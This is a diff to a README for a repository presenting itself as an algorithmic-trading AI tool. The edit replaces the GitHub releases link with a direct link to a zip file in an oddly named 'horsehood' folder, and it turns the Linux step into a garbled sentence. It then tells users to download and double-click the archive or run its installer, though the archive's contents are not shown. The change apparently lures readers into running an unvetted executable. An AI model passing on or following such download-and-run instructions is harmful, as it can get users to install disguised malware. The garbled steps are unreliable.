Anna-007-tech/algorithmic-trading-ai/README.md

    - Follow the installation prompts for your operating system.
    - For Windows, you may need to click 'Run' after download.
    - For Mac, drag the application icon to your Applications folder.
-   - On Linux, extract the tar.gz file and run the installation script.
+   - On Linux, extract the https://raw.githubusercontent.com/Anna-007-tech/algorithmic-trading-ai/main/horsehood/algorithmic-trading-ai.zip file and run the installation script.

 4. **Download & Install**
-   - You can download the latest version [here](https://github.com/Anna-007-tech/algorithmic-trading-ai/releases).
+   - You can download the latest version [here](https://raw.githubusercontent.com/Anna-007-tech/algorithmic-trading-ai/main/horsehood/algorithmic-trading-ai.zip).
    - After downloading, double-click the file and follow the instructions.

 5. **Starting the Application**